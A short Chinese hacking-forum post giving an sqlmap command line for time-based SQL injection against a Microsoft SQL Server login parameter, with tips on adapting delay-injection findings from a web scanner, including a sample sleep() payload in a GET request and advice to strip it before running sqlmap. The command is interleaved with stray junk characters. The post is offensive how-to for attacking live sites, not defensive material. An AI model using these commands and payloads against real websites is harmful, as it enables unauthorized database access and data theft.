找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2735|回复: 0
打印 上一主题 下一主题

sqlmap遇到延时注入的注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2016-4-14 15:52:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
E:\sqlmapp2>sqlmap.py -r bao/who.txt -p txtUserName --dbms=mssql --technique=S -
$ [; W* L! P) I- x+ s-current-db -v 3 --level 4
, \5 K; [% k% g  D  \" @" k/ f& K) y' Y% i& T% i( T
不加参数注入检测不到注入点,尝试各种方法都不行,这里要提醒一下大家,用WVS扫描到的延时注入一定要改包,把wait for那部分删除掉然后再注入,比如:GET /view/Statistic/Http_Host.php?category=if(now()=sysdate()%2Csleep(6)%2C0)&device=&pagecur=0 HTTP/1.1,必须把category=if(now()=sysdate()%2Csleep(6)%2C0)改为category=1然后再注入,否则识别不了注入。特别是category=空,无法识别注入,记得-p category
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表